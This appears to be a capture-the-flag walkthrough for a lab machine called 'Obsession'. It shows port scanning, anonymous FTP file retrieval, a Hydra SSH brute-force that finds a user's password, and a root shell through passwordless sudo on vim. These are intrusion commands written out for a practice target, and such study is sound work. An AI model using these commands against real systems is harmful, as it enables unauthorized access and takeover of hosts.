Obsession
export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
Port | State | Service |
---|---|---|
21/tcp | open | FTP |
22/tcp | open | SSH |
80/tcp | open | HTTP |
FTP Service
Anonymous Login
A common misconfiguration in FTP servers is allowing anonymous access. An attempt was made to log in using anonymous credentials.
ftp $TARGET_IP
Credentials:
- Username:
anonymous
- Password: (blank)
Result: The anonymous login was successful, granting access to the FTP server.
File Discovery and Retrieval
The ls
command was used to list the contents of the accessible directory.
ftp> ls
Output:
-rw-r--r-- 1 0 0 667 Jun 18 2024 chat-gonza.txt
-rw-r--r-- 1 0 0 315 Jun 18 2024 pendientes.txt
Two files, chat-gonza.txt
and pendientes.txt
, were discovered and subsequently downloaded using the get
command.
ftp> get chat-gonza.txt
ftp> get pendientes.txt
Content Analysis
The retrieved files were analyzed for sensitive information.
cat chat-gonza.txt pendientes.txt
Content Summary:
chat-gonza.txt
: A chat log between two users, "Gonza" and "Russoski," discussing a video hosted on a secure location within Russoski's computer and mentioning a gym session.pendientes.txt
: A to-do list containing tasks related to a certification, online services, a vulnerable lab project, and security configurations.
Inferred Information: Potential usernames: gonza
and russoski
. Visit the webpage in http://172.17.0.2/
and with some basic investigation you can realize that Russoski could be behind this.
SSH Brute-Force
Based on the discovered username russoski
and the common password list rockyou.txt
, a brute-force attack was launched against the SSH service using Hydra.
hydra -l "russoski" -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -f
Result: The attack successfully identified the password iloveme
for the user russoski
.
Privilege Escalation
Using the obtained credentials, a successful SSH connection was established.
ssh russoski@$TARGET_IP
The sudo -l
command revealed that the user russoski
could execute vim
as root without a password.
sudo -l
Output:
Matching Defaults entries for russoski on 96d1d89bd82e:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User russoski may run the following commands on 96d1d89bd82e:
(root) NOPASSWD: /usr/bin/vim
Exploiting Vim for Root Shell
Leveraging the GTFOBins resource (https://gtfobins.github.io/gtfobins/vim/#sudo), a root shell was obtained by executing Vim with a specific command.
sudo vim -c ':!/bin/sh'
id
Result: Successful privilege escalation to root, confirmed by the id
command output: uid=0(root) gid=0(root) groups=0(root)
.